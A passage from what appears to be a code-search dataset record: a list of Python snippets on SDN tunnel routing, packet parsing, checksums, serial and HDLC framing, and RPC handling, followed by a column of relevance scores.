match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(ip_dscp)\n # + ' already exists, aborting addition of new route')\n return\n\n for tunnel in TUNNELS:\n if (tunnel.sApn.ip_addr == match['ipv4_dst'] and tunnel.dApn.ip_addr == match['ipv4_src']) or (tunnel.sApn.ip_addr == match['ipv4_src'] and tunnel.dApn.ip_addr == match['ipv4_dst']):\n LOG.debug('ROUTING: Tunnel candidate found in list of tunnels. Adding tunnel path: ' + str(tunnel.po_edges) + ' to candidates.')\n candidates.append(tunnel)\n\n trafficClass = self.TC_selection(match['ip_dscp'])\n\n if len(candidates) == 0:\n LOG.debug('ROUTING: match[ipv4_dst]: ' + str(match['ipv4_dst'])\n + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp']))\n LOG.debug('ROUTING: ERROR, NO feasible tunnels for such route.')\n return\n\n LOG.debug('Looking for tunnels: DST_IP: ' + match['ipv4_dst'] + ' SRC_IP: ' + match['ipv4_src'] + ' DSCP: ' + str(match['ip_dscp']) + '(traffic class: ' + str(trafficClass) + ')' + ' Incoming from FWD: ' + str(dp.id))\n tunnel = self.tunnel_selection(trafficClass, candidates)\n LOG.debug('TE MNGR: Selected tunnel Path out: ' + str(tunnel.path_out_str) + ' meter_id: ' + str(tunnel.meter_id))\n\n dscp = match['ip_dscp']\n\n ## meter_id\n ## 2,4,6,8,10 = 500kbps, 1,3,5,7,9 = 1000kbps ...\n ## 0 = 100Gbps\n meter_id = tunnel.meter_id\n\n #\n # FIXME: incomplete set of rules installed on LAN Access forwarders\n # TODO : Philosophy of table IDs should be clarified, as now it total mess!!!\n # TODO : this should be done only once, from that moment, all user plane packets\n # should travelse only forwarder and should not be sent to controller\n\n\n\n #WAY OUT\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.dApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_src=tunnel.tid_in), parser.OFPActionSetField(eth_dst=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id=INGRESS_TABLE)\n dp.send_msg(req)\n\n LOG.debug('ROUTING: Installing flow 
ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.dApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.dApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_out))\n\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_out)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.dApn.eth_addr), parser.OFPActionOutput(tunnel.path_out[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.dApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_out)+ ' dApn ETH addr: ' + str(tunnel.dApn.eth_addr))\n\n #WAY IN\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.sApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.tid_in), parser.OFPActionSetField(eth_src=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id = INGRESS_TABLE)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.sApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.sApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_in))\n\n\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_in)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.sApn.eth_addr), parser.OFPActionOutput(tunnel.path_in[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.sApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_in)+ ' sApn ETH addr: ' + str(tunnel.sApn.eth_addr))\n\n\n LOG.debug('ROUTING: Rules on access edge forwarders installed')\n LOG.debug('ROUTING: Adding route: DST_IP: ' + tunnel.dApn.ip_addr + ' SRC_IP: ' + tunnel.sApn.ip_addr + ' dscp: ' + str(dscp) + ' path out str: ' + tunnel.path_out_str )\n routesList.append( ( tunnel.sApn.ip_addr, tunnel.dApn.ip_addr, dscp) )\n\n parser = dp.ofproto_parser\n\n for dpid in LAN_TYPE_FORWARDERS:\n ## DUNNO why this rule with low priority still hits traffic which is also matched by rules with IP address matches\n ## Here I delete the rule, it is added on FWD when it connects to controoller\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dpid) + ' is a LAN edge forwarder, deleting rules')\n dp = dpset.get(dpid)\n priority = 2\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT,\n table_id=0, actions=actions,\n match=match, priority=priority)\n\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is a LAN edge forwarder, installing rules again :)')\n match = 
parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.add_flow(dp, 2, match, actions)", "def get_response(self):\n\n response = self.socket.recv(1024)\n code = response.split(\" \")[0]\n message = response[4:]\n\n return int(code), message", "def read_test(self, cmd):\n w_bytes = [random.randrange(0, 128) for i in range(0, 16)]\n self._pyb.send(w_bytes)\n self._serial.reset_input_buffer()\n self._serial.write('\\r\\n'.encode('utf-8'))\n self._serial.write(cmd.encode('utf-8'))\n self._serial.write('\\r\\n'.encode('utf-8'))\n\n res = self._serial.read_until(terminator=serial.to_bytes([ord(c) for c in 'Ignored '])).decode('utf-8')\n self._pyb.deinit()\n\n r_bytes = []\n for x in re.sub('\\r', '', res).split('\\n'):\n if x.find('IGNORE') != -1:\n r_bytes = [int(s, 16) for s in x.split(',') if len(s) == 2]\n break\n\n if self.compare_host_dut_result(w_bytes, r_bytes) == -1:\n print(repr(res))\n return \"Fail\"\n\n return \"Pass\"", "def callback(self, pkt):\n if ARP in pkt:\n self.parse_ip(pkt.sprintf(\"%ARP.psrc%\"))\n if TCP in pkt or UDP in pkt:\n self.parse_ip(pkt.sprintf(\"%IP.src%\"))\n self.parse_ip(pkt.sprintf(\"%IP.dst%\"))", "def state_end_sub(self, byte):\n self.telnet_cmd.append(byte)\n if byte == 240:\n self.handle_telnet_cmd(self.telnet_cmd)\n self.next_fn = self.state_text\n else:\n self.next_fn = self.state_sub", "def check_packet(self, header, string):\n\n string = string[0:11] + string[75:]\n gen_chksum = hashlib.sha256(string.encode()).hexdigest()\n try:\n if header[\"checksum\"] == gen_chksum:\n return True\n else:\n return False\n except KeyError:\n return False", "def parse(line: str):\n # Arduino sends 'keep alive' packets to keep the serial connection open\n # the keep alive packet is just an empty byte\n if line == '':\n return Action('DEBUG', 'Arduino sent keep alive packet')\n # Handles special packets\n if '|' in line:\n split_line: List[str] = line.split('|')\n directive: str = split_line[0]\n value = None\n if directive == 'DEBUG':\n value = split_line[1]\n return Action(directive, value)\n # Handles foot action\n try:\n [l_pitch, l_yaw, l_roll,\n r_pitch, r_yaw, r_roll] = list(map(int, line.split(' ')))\n except ValueError as ex:\n raise RuntimeError(f'FOOT packet unrecognized: {line}') from ex\n return Action('FOOT', {\n 'left': {\n 'pitch': l_pitch,\n 'yaw': l_yaw,\n 'roll': l_roll\n },\n 'right': {\n 'pitch': r_pitch,\n 'yaw': r_yaw,\n 'roll': r_roll\n }\n })", "def _checksum(cls, buff):\n checksum = 0\n\n while True:\n data = buff.read(cls.checksum_struct.size)\n\n if len(data) == 0:\n break\n if len(data) < 4:\n pad_count = len(data) % 4\n data = data + \"\\x00\" * pad_count\n raise ValueError(\"Checksum data length is not a multiple of 4. 
%d\" % len(data))\n print(data)\n c1, c2 = cls.checksum_struct.unpack(data)\n checksum += c1 + c2\n print(checksum, checksum % 65536) # novatel 32 bit crc\n return checksum % 65536", "def test_xmodem_recv_bad_checksum():\n # Given,\n _, send_filename = tempfile.mkstemp()\n try:\n with open(send_filename, 'wb') as stream:\n fill_binary_data(stream)\n proc = subprocess.Popen(\n (send_prog, '--xmodem', '--verbose', send_filename),\n stdin=subprocess.PIPE, stdout=subprocess.PIPE, bufsize=0)\n\n getc = functools.partial(_proc_getc_fail_16bit_checksum, proc=proc)\n putc = functools.partial(_proc_putc, proc=proc)\n\n xmodem = XMODEM(getc, putc)\n recv_stream = BytesIO()\n\n # Exercise,\n status = xmodem.recv(recv_stream, timeout=5, crc_mode=1)\n\n # Verify,\n assert status == recv_stream.tell()\n verify_binary_data(recv_stream, padding=b'\\x1a')\n proc.wait()\n assert proc.returncode == 0\n\n finally:\n os.unlink(send_filename)", "def receive(self, timeout_sec: float, expected_cmd_reply: Optional[int]) -> Tuple[bytes, bool]:\n\n # Sanity check.\n if timeout_sec <= 0:\n raise ValueError('Timeout cannot be less or equal zero')\n\n # Calculate timeout\n now = time.clock_gettime(time.CLOCK_MONOTONIC)\n timeout = now + timeout_sec\n\n # Checksum OK?\n checksum_ok = False\n while not checksum_ok:\n # Get start of a command\n got_command = False\n while not got_command:\n # Wait for sync byte\n now = time.clock_gettime(time.CLOCK_MONOTONIC)\n while timeout > now:\n self._uart.timeout = timeout - now\n sync_byte = self._uart.read(size=1)\n if len(sync_byte) != 1:\n raise TimeoutError('Waiting for sync byte timed out')\n if sync_byte[0] == 0xAA:\n break\n now = time.clock_gettime(time.CLOCK_MONOTONIC)\n\n # Get command byte. 0xAA is not a valid command reply or indication.\n # Skip superfluous 0xAA bytes but resync to 0xAA on other\n # unexpected command-reply or indication codes.\n command_byte = bytes([0xAA])\n while command_byte[0] == 0xAA:\n now = time.clock_gettime(time.CLOCK_MONOTONIC)\n self._uart.timeout = timeout - now\n command_byte = self._uart.read(size=1)\n if len(command_byte) != 1:\n raise TimeoutError('Waiting for command byte timed out')\n if expected_cmd_reply is not None:\n if command_byte[0] == expected_cmd_reply or command_byte[0] in self._valid_indications:\n got_command = True\n break\n elif (command_byte[0] & 0x7F in self._valid_commands and command_byte[0] & 0x80 == 0x80) or command_byte[0] in self._valid_indications:\n got_command = True\n break\n\n # Get length byte\n now = time.clock_gettime(time.CLOCK_MONOTONIC)\n if now >= timeout:\n raise TimeoutError('Waiting for length byte timed out')\n self._uart.timeout = timeout - now\n length_byte = self._uart.read(size=1)\n if len(length_byte) == 0:\n raise TimeoutError('Waiting for length byte timed out')\n\n # Receive remaining bytes\n now = time.clock_gettime(time.CLOCK_MONOTONIC)\n if now >= timeout:\n raise TimeoutError('Timeout while reading remaining bytes')\n self._uart.timeout = timeout - now\n bytes_to_read = length_byte[0] + 1\n further_bytes = self._uart.read(bytes_to_read)\n if len(further_bytes) != bytes_to_read:\n raise TimeoutError('Timeout while reading remaining bytes')\n\n # Calculate checksum\n checksum = 0xAA + command_byte[0] + length_byte[0]\n for value in further_bytes:\n checksum += value\n\n # Checksum OK?\n checksum_ok = ((checksum & 0xFF) == 0)\n\n # Return result\n result = command_byte + length_byte + further_bytes[0:-1]\n return (result, command_byte[0] in self._valid_indications)", "async def 
read_one_message(self):\n if not self.connected:\n return None\n\n try:\n header = await self.reader.readexactly(2)\n except SocketError as err:\n if err.errno == errno.ECONNRESET:\n self.log.error('Connection reset by peer')\n self.connected = False\n if err.errno == errno.EHOSTUNREACH:\n self.log.error('Spa unreachable')\n self.connected = False\n else:\n self.log.error('Spa socket error: {0}'.format(str(err)))\n return None\n except Exception as e:\n self.log.error('Spa read failed: {0}'.format(str(e)))\n return None\n\n if header[0] == M_START:\n # header[1] is size, + checksum + M_END (we already read 2 tho!)\n rlen = header[1]\n else:\n return None\n\n # now get the rest of the data\n try:\n data = await self.reader.readexactly(rlen)\n except Exception as e:\n self.log.errpr('Spa read failed: {0}'.format(str(e)))\n return None\n\n full_data = header + data\n # don't count M_START, M_END or CHKSUM (remember that rlen is 2 short)\n crc = messages.Message.crc(full_data[1:rlen - 1])\n if crc != full_data[-2]:\n self.log.error('Message had bad CRC, discarding')\n return None\n\n # self.log.error('got update: {}'.format(full_data.hex()))\n return full_data", "def run(self):\n\t\twith self.scanner_lock:\n\t\t\tcode = \"\"\n\t\t\tdone_reading = False\n\t\t\twhile not done_reading:\n\t\t\t\t# lsusb -v : find wMaxPacketSize (8 in my case)\n\t\t\t\ttry:\n\t\t\t\t\tdata = self.scanner_endpoint.read(BUFFER_SIZE, timeout=20)\n\t\t\t\t\tif data is 0:\n\t\t\t\t\t\tdone_reading = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tcode += hid2ascii(data)\n\t\t\t\t# try:\n\t\t\t\t# \t# lsusb -v : find wMaxPacketSize (8 in my case)\n\t\t\t\t# \ta = scanner_endpoint.read(64, timeout=2000)\n\t\t\t\texcept usb.core.USBError:\n\t\t\t\t\tdone_reading = True\n\n\t\treturn code", "def parse_packet(packet, recipient_type, pkt_type, exp_src, exp_dst, step):\n\n packet_count = 0\n expected_packet_count = PKT_COUNT\n\n # Calling check_packet helper function to determine how many packets are\n # correctly received. Function returns packet_count\n packet_count = check_packet(\n packet, recipient_type, pkt_type, exp_src, exp_dst)\n\n # Print packet count at each host\n print(\"Packet count at {} was {}\".format(recipient_type, packet_count))\n\n # Store packet_counts in global dict RECEIVED_PKT_DICT\n # Dict needed for ECMP check\n RECEIVED_PKT_DICT[recipient_type] = packet_count", "def parse_payload(self):\n while len(self.buffer) >= 10:\n \"\"\" check magic word \"\"\"\n if self.buffer[0:2] != self.mw:\n #LogDebug(\"drop all buffer due to incorrect magic word\")\n self.buffer = b\"\" # drop entire buffer\n\n \"\"\" extract the value from length field \"\"\"\n length = struct.unpack(\"I\", self.buffer[2:6])[0] + 1\n #print \"packet len\", length, \"buffer len\", len(self.buffer)\n if len(self.buffer) < length:\n #LogDebug(\"imcompleted packet will be processed later\")\n break\n\n \"\"\" verify the packet CRC \"\"\"\n calculated_crc = struct.pack(\"I\", binascii.crc32(self.buffer[:length-4]) & 0xFFFFFFFF)\n if calculated_crc != self.buffer[length-4:length]:\n pass\n else:\n payload = self.buffer[6:length-4]\n self.payloads.append(payload)\n self.buffer = self.buffer[length:]", "def next(self):\n if self.done():\n return False\n opcodeArrayRef = opcode.opcodeArray\n\n op = opcodeArrayRef[self.script[self.offset]]\n if op.length == 1:\n # No additional data. 
Note that some of the opcodes, notably OP_1NEGATE,\n # OP_0, and OP_[1-16] represent the data themselves.\n self.offset += 1\n self.op = op\n self.d = ByteArray(b\"\")\n return True\n elif op.length > 1:\n # Data pushes of specific lengths -- OP_DATA_[1-75].\n script = self.script[self.offset :]\n if len(script) < op.length:\n self.err = DecredError(\n \"opcode %s requires %d bytes, but script only has %d remaining\"\n % (op.name, op.length, len(script))\n )\n return False\n\n # Move the offset forward and set the opcode and data accordingly.\n self.offset += op.length\n self.op = op\n self.d = script[1 : op.length]\n return True\n elif op.length < 0:\n # Data pushes with parsed lengths -- OP_PUSHDATA{1,2,4}.\n script = self.script[self.offset + 1 :]\n if len(script) < -op.length:\n self.err = DecredError(\n \"opcode %s requires %d bytes, but script only has %d remaining\"\n % (op.name, -op.length, len(script))\n )\n return False\n\n # Next -length bytes are little endian length of data.\n if op.length == -1:\n dataLen = script[0]\n elif op.length == -2:\n dataLen = script[:2].unLittle().int()\n elif op.length == -4:\n dataLen = script[:4].unLittle().int()\n else:\n self.err = DecredError(\"invalid opcode length %d\" % op.length)\n return False\n\n # Move to the beginning of the data.\n script = script[-op.length :]\n\n # Disallow entries that do not fit script or were sign extended.\n if dataLen > len(script) or dataLen < 0:\n self.err = DecredError(\n \"opcode %s pushes %d bytes, but script only has %d remaining\"\n % (op.name, dataLen, len(script))\n )\n return False\n\n # Move the offset forward and set the opcode and data accordingly.\n self.offset += 1 - op.length + dataLen\n self.op = op\n self.d = script[:dataLen]\n return True\n\n # The only remaining case is an opcode with length zero which is\n # impossible.\n raise AssertionError(\"unreachable\")", "async def process(self, hdr: PacketHeader, payload: bytes) -> Optional[bytes]:\n # todo scheduled task may be better\n self._result_cache.ageout()\n\n args = payload\n\n # Bad header\n if hdr.is_reply:\n return RPCObjectServer.reply_packet(\n PacketFlags.REPLY, ExecutionStatus.BAD_REQUEST\n )\n\n # Client is ACKing a previous reply.\n # Drop cached reply, if it exists.\n # We don't care about the invocation semantics because it doesn't really matter.\n if hdr.flags & PacketFlags.ACK_REPLY:\n tid = hdr.trans_num.value\n self._result_cache.pop(tid, None)\n return\n\n try:\n if hdr.semantics is InvocationSemantics.AT_LEAST_ONCE:\n res = await self._call_alo(hdr.method_ordinal.value, args)\n return RPCObjectServer.reply_packet(\n hdr, PacketFlags.REPLY, ExecutionStatus.OK, res\n )\n else:\n res, cached = await self._call_amo(\n hdr.trans_num.value, hdr.method_ordinal.value, args\n )\n\n status = ExecutionStatus.OK\n if isinstance(res, Exception):\n if isinstance(res, exceptions.RPCError):\n status = exception_to_estatus(type(res))\n else:\n status = ExecutionStatus.INTERNAL_FAILURE\n res = b\"\"\n\n return RPCObjectServer.reply_packet(\n hdr,\n PacketFlags.REPLY\n | (PacketFlags.REPLAYED if cached else PacketFlags.NONE),\n status,\n res,\n )\n except exceptions.RPCError as e:\n status = exception_to_estatus(type(e))\n except Exception:\n status = ExecutionStatus.INTERNAL_FAILURE\n\n return RPCObjectServer.reply_packet(hdr, PacketFlags.REPLY, status)", "def receiveCallback(self, socket, stateMask):\n # read the PDU header\n pduHeader = self.recv(EGSE.EDENPDU.PDU_HEADER_BYTE_SIZE)\n if pduHeader == None:\n # failure handling was done 
automatically by derived logic\n return\n # consistency check\n pduHeaderLen = len(pduHeader)\n if pduHeaderLen != EGSE.EDENPDU.PDU_HEADER_BYTE_SIZE:\n LOG_ERROR(\"Read of PDU header failed: invalid size: \" + str(pduHeaderLen))\n self.disconnectClient()\n return\n pdu = EGSE.EDENPDU.PDU(pduHeader)\n # read the data field for the PDU\n dataFieldLength = pdu.dataFieldLength\n if dataFieldLength > 0:\n dataField = self.recv(dataFieldLength)\n if dataField == None:\n # failure handling was done automatically by derived logic\n return\n # consistency check\n remainingSizeRead = len(dataField)\n if remainingSizeRead != dataFieldLength:\n LOG_ERROR(\"Read of remaining PDU failed: invalid remaining size: \" + str(remainingSizeRead))\n self.disconnectClient()\n return\n pdu.setDataField(dataField)\n # dispatch depending on pduType and subType\n try:\n if pdu.pduType == EGSE.EDENPDU.PDU_TYPE_TC:\n if pdu.subType == EGSE.EDENPDU.SUB_TYPE_SPACE:\n # (TC,SPACE)\n LOG_INFO(\"EDEN.Server.receiveCallback(TC,SPACE)\")\n tcSpacePDU = EGSE.EDENPDU.TCspace(pdu.buffer)\n if self.notifyTcSpace(tcSpacePDU.getCCSDSpacket()):\n # forwarding OK\n self.sendTc_eSpace(tcSpacePDU, 0)\n self.sendTc_aSpace(0, tcSpacePDU.tcIdentificationWord)\n else:\n # forwarding failed\n self.sendTc_eSpace(tcSpacePDU, 1)\n self.sendTc_aSpace(1, tcSpacePDU.tcIdentificationWord)\n elif pdu.subType == EGSE.EDENPDU.SUB_TYPE_SCOE:\n # (TC,SCOE)\n LOG_INFO(\"EDEN.Server.receiveCallback(TC,SCOE)\")\n tcScoePDU = EGSE.EDENPDU.TCscoe(pdu.buffer)\n if self.notifyTcScoe(tcScoePDU.getCCSDSpacket()):\n # forwarding OK\n self.sendTc_eScoe(tcScoePDU, 0)\n self.sendTc_aScoe(0, tcScoePDU.tcIdentificationWord)\n else:\n # forwarding failed\n self.sendTc_eScoe(tcScoePDU, 1)\n self.sendTc_aScoe(1, tcScoePDU.tcIdentificationWord)\n else:\n LOG_ERROR(\"Read of PDU header failed: invalid subType: \" + str(pdu.subType))\n LOG(\"PDU = \" + str(pdu))\n self.disconnectClient()\n elif pdu.pduType == EGSE.EDENPDU.PDU_TYPE_CMD:\n if pdu.subType == EGSE.EDENPDU.SUB_TYPE_EXEC:\n # (CMD,EXEC)\n LOG_INFO(\"EDEN.Server.receiveCallback(CMD,EXEC)\")\n self.notifyCmdExec(pdu.getDataField().tostring())\n else:\n LOG_ERROR(\"Read of PDU header failed: invalid subType: \" + str(pdu.subType))\n LOG(\"PDU = \" + str(pdu))\n self.disconnectClient()\n else:\n LOG_ERROR(\"Read of PDU header failed: invalid pduType: \" + str(pdu.pduType))\n LOG(\"PDU = \" + str(pdu))\n self.disconnectClient()\n except Exception as ex:\n LOG_ERROR(\"Processing of received PDU failed: \" + str(ex))\n self.disconnectClient()", "def process_frame():\n return \"OK\"", "def calc_checksum(self):\n total = 0\n packet = ipv4(self.bytes)\n packet.checksum = 0\n bytes = packet.bytes\n if len(bytes) % 2 == 1:\n bytes += \"\\0\"\n for i in range(len(bytes)/2):\n total += (struct.unpack(\"!H\", bytes[2*i:2*i+2])[0])\n total = (total >> 16) + (total & 0xffff)\n total += total >> 16\n return ~total", "def _decode(self):\n \n self.version = int(data_to_hex_str(self.packet[0])[2])\n self.header_len = int(data_to_hex_str(self.packet[0])[3]) * 4\n self.type_of_service = data_to_hex_str(self.packet[1:2])\n self.total_len = int(data_to_hex_str(self.packet[2:4]), 16)\n self.id = data_to_hex_str(self.packet[4:6])\n \n #parse the flags fields(reservedbit, don't fragment, more fragment)\n if ((ord(self.packet[6]) & (1 << 7)) != 0):\n self.flags_reservedbit = 1\n else:\n self.flags_reservedbit = 0\n #endof if\n \n if ((ord(self.packet[6]) & (1 << 6)) != 0):\n self.flags_dont_fragment = 1\n else:\n self.flags_dont_fragment = 
0\n #endof if\n \n if ((ord(self.packet[6]) & (1 << 5)) != 0):\n self.flags_more_fragment = 1\n else:\n self.flags_more_fragment = 0\n #endof if\n \n #parse the offset field(in packet[6:7]): 00011111 & packet[6] (to filter flags) -->> get packet[6:7] in hex_str\n #tmp = str(31 & ord(self.packet[6]))\n self.fragment_offset = int(data_to_hex_str(self.packet[6:8]), 16)\n if (self.fragment_offset >= (1 << 13)):\n #take away the flags fields: 00011111 11111111 & self.fragment_offset\n self.fragment_offset = self.fragment_offset & ((1 << 13) - 1) \n \n self.TTL = ord(self.packet[8])\n self.protocol = IPPROTO[ord(self.packet[9])]\n self.header_checksum = data_to_hex_str(self.packet[10:12])\n \n self.src = str(ord(self.packet[12])) + '.' + str(ord(self.packet[13])) + '.' + \\\n str(ord(self.packet[14])) + '.' + str(ord(self.packet[15]))\n self.dst = str(ord(self.packet[16])) + '.' + str(ord(self.packet[17])) + '.' + \\\n str(ord(self.packet[18])) + '.' + str(ord(self.packet[19]))\n \n if (self.header_len > 20):\n self.opt_paddings = self.packet[20 : (self.header_len)]", "def __checksum_make(self, data):\n self.logger.info(\"{}: building the checksum for bytes {}.\".format(self.sensor_name, \":\".join(\"%02x\" % b for b in data)))\n\n if len(data) not in (self.__CommandLength - 2, self.__ResponseLength - 2):\n raise ValueError(\"{}: length data has to be {} or {}.\".format(self.sensor_name, self.__CommandLength - 2, self.__ResponseLength))\n\n if data[0] != self.__SerialStart:\n raise ValueError(\"{}: data is missing the start byte.\".format(self.sensor_name))\n\n if data[1] not in (self.__SendByte, self.__ResponseByte, self.__ReceiveByte):\n raise ValueError(\"{}: data is missing SendByte, ReceiveByte or ReceiveValue-Byte\".format(self.sensor_name))\n\n if data[1] != self.__ReceiveByte and data[2] not in command.values():\n raise ValueError(\"{}: the data command byte value \\\"{}\\\" is not valid.\".format(self.sensor_name, data[2]))\n\n # Build checksum for data to send or receive\n checksum = 0\n for i in range(2, len(data)):\n checksum = checksum + data[i]\n checksum = checksum % 256\n\n self.logger.info(\"{}: checksum calculated {} for bytes {}.\".format(self.sensor_name, \"%02x\" % checksum, \":\".join(\"%02x\" % b for b in data)))\n return checksum", "def _read(self):\n \n try:\n d = self._get_byte()\n ts = time.time()\n while d != self.HDLC_FLAG_BYTE:\n d = self._get_byte()\n ts = time.time()\n packet = [d]\n d = self._get_byte()\n if d == self.HDLC_FLAG_BYTE:\n d = self._get_byte()\n ts = time.time()\n else:\n packet.append(d)\n while d != self.HDLC_FLAG_BYTE:\n d = self._get_byte()\n packet.append(d)\n if self._debug == True:\n print \"Serial:_read: unescaped\", packet\n packet = self._unescape(packet)\n \n crc = self._crc16(0, packet[1:-3])\n packet_crc = self._decode(packet[-3:-1])\n \n if crc != packet_crc:\n print \"Warning: wrong CRC! 
%x != %x %s\" % (crc, packet_crc, [\"%2x\" % i for i in packet])\n if self._debug:\n if self._ts == None:\n self._ts = ts\n else:\n print \"Serial:_read: %.4f (%.4f) Recv:\" % (ts, ts - self._ts), self._format_packet(packet[1:-3])\n self._ts = ts\n return RawPacket(ts, packet[1:-3], crc == packet_crc)\n except socket.timeout:\n return None", "def recv(self) -> tuple:\n (data, c) = self.socket.recvfrom(Rudp.Packet.buffer())\n # print(data)\n (packet, validity) = Rudp.Packet.unpack(data)\n if(validity):\n print(\"Valid Packet Received From: \", c)\n else:\n raise Rudp.InvalidPacket(\"Invalid Packet Received\")\n\n return (packet, validity, c)", "def parseCommand(self, msg):\n if msg == \"\":\n return\n if self.interpreter.debug:\n print \"Modem::parseCommand: \", msg\n if(self.status == Modem.Status.KILL):\n return\n command = msg.split(Interpreter.SEPARATOR)\n if (len(command)==1):\n if (command[0] == 'OK'):\n return self.confirmedMyIstr()\n elif (len(command)==2):\n if (command[0] == 'error'):\n return self.error(int(command[1]))\n elif (len(command)==3):\n if (command[0] == 'send_file'):\n cmd2 = re.sub(\"[^0-9]\", \"\", command[2])\n return self.recvDataFile(command[1],int(cmd2),False)\n elif (command[0] == 'send_stream'):\n cmd2 = re.sub(\"[^0-9]\", \"\", command[2])\n return self.recvDataFile(command[1],int(cmd2),False)\n return self.reset_myself()", "def parsePacket(self, packet):\n \n pcktParts = packet.split()\n \n # needs exactly 4 parts\n if len(pcktParts) != 4:\n raise PacketException(\"Packet malformed.\")\n \n direction = pcktParts[0]\n ip = pcktParts[1]\n port = pcktParts[2]\n flag = pcktParts[3]\n\n try:\n pckt = Packet(direction, ip, port, flag)\n except Exception as ex:\n eprint(\"Corrupt Packet:{0} Ignoring packet:\\n{1}\".format(ex, packet.__str__()))\n return None\n \n return pckt", "def handle_packet(self, packet, ip_proto=None):\n logger.info('Packet data - [%s]', packet.summary())\n return False", "def respond(self):\n\n if not self.board.board:\n hand_data = HandEvaluator.evaluate_preflop_hand(self.hand)\n elif self.board:\n hand_data = HandEvaluator.evaluate_hand(self.board.cards + list(self.hand))\n if len(self.board.board) == 3:\n return Check()\n elif len(self.board.board) == 4:\n return Check()\n elif len(self.board.board) == 5:\n return Check()\n \n # always return Check() as last resort, because it beats Fold()\n return Check()", "def reader(self):\n while self.alive:\n try:\n data = self.serial.read_until(b'~')[:-1]\n packet = ethernet.Ethernet(data)\n if packet[icmp.ICMP]:\n packet[ethernet.Ethernet].dst_s = \"dc:a6:32:00:a7:8b\"\n packet[ip.IP].dst_s = \"192.168.1.35\"\n packet[icmp.ICMP].sum = b'0x1783'\n print(\"\\n\\n__________________RESPONSE FROM VISIBLE PI__________________\")\n print(packet)\n if data:\n self.write(packet.bin())\n except socket.error as msg:\n break\n self.alive = False" ]
[ "0.5792792", "0.56804043", "0.5637224", "0.55658627", "0.5561786", "0.5408823", "0.53773457", "0.5322868", "0.5277083", "0.52678686", "0.52137786", "0.5208731", "0.51964766", "0.5184436", "0.51623356", "0.5156039", "0.51016897", "0.51004124", "0.50996864", "0.508539", "0.5084296", "0.5061333", "0.5051528", "0.50316834", "0.5030048", "0.5013841", "0.49835753", "0.4948625", "0.4934323", "0.49079862", "0.48898607", "0.4884699", "0.48780736", "0.4872789", "0.48727885", "0.48725367", "0.48655856", "0.4850961", "0.4846056", "0.48396713", "0.48343945", "0.48329267", "0.4828932", "0.4828932", "0.4826175", "0.4825916", "0.4820336", "0.48165053", "0.48085216", "0.47929054", "0.4786804", "0.47770074", "0.47710106", "0.47695637", "0.47535884", "0.47506315", "0.47442436", "0.4740757", "0.4735184", "0.47319987", "0.4727423", "0.472101", "0.4719311", "0.4707356", "0.47040352", "0.4697282", "0.46947488", "0.46946377", "0.4689225", "0.46882492", "0.46832222", "0.46788907", "0.4665144", "0.46651354", "0.4661338", "0.46583548", "0.46493092", "0.4645533", "0.46450523", "0.4643488", "0.46321276", 